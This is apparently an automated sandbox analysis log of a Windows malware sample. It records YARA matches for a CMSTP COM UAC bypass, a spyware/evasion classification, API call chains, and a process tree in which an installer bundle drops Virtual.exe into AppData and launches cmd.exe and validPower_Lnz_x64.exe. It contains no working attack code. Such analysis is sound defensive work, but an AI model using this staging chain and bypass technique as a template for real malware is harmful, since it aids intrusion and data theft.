                  Source: KClGcCpDAP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                  Source: 20.2.validPower_Lnz_x64.exe.2671aed.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.cmd.exe.33907f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.2.validPower_Lnz_x64.exe.264a6ed.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.cmd.exe.3364a08.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.2.validPower_Lnz_x64.exe.2604a20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.validPower_Lnz_x64.exe.26726ed.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.validPower_Lnz_x64.exe.262ca20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.2.validPower_Lnz_x64.exe.2649aed.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: classification engineClassification label: mal96.spyw.expl.evad.winEXE@22/25@1/1
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008AFE21 FormatMessageW,GetLastError,LocalFree,0_2_008AFE21
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008745EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,0_2_008745EE
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D045EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,1_2_00D045EE
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66663DA4 _errno,_invalid_parameter_noinfo,GetDiskFreeSpaceA,GetLastError,_errno,2_2_66663DA4
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008B304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_008B304F
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_00896B88 ChangeServiceConfigW,GetLastError,0_2_00896B88
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeFile created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeFile created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\Jump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: cabinet.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: msi.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: version.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: wininet.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: comres.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: clbcatq.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: msasn1.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: crypt32.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: feclient.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: cabinet.dll0_2_00871070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: cabinet.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: msi.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: version.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: wininet.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: comres.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: clbcatq.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: msasn1.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: crypt32.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: feclient.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: cabinet.dll1_2_00D01070
                  Source: KClGcCpDAP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: KClGcCpDAP.exeVirustotal: Detection: 8%
                  Source: KClGcCpDAP.exeReversingLabs: Detection: 23%
                  Source: KClGcCpDAP.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
                  Source: KClGcCpDAP.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeFile read: C:\Users\user\Desktop\KClGcCpDAP.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\KClGcCpDAP.exe "C:\Users\user\Desktop\KClGcCpDAP.exe"
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeProcess created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe "C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe" -burn.clean.room="C:\Users\user\Desktop\KClGcCpDAP.exe" -burn.filehandle.attached=524 -burn.filehandle.self=544
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeProcess created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe "C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe"
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeProcess created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe "C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe"
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe "C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe"
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeProcess created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe "C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe" -burn.clean.room="C:\Users\user\Desktop\KClGcCpDAP.exe" -burn.filehandle.attached=524 -burn.filehandle.self=544 Jump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeProcess created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe "C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe"Jump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeProcess created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: msxml3.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: feclient.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: msxml3.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: feclient.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: newdev.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: vboxddu.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: vboxrt.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: msvcp100.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: vboxrt.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: newdev.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: devrtl.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: newdev.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: vboxddu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: vboxrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcp100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: vboxrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: newdev.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: devrtl.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: newdev.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: vboxddu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: vboxrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcp100.dllJump to behavior
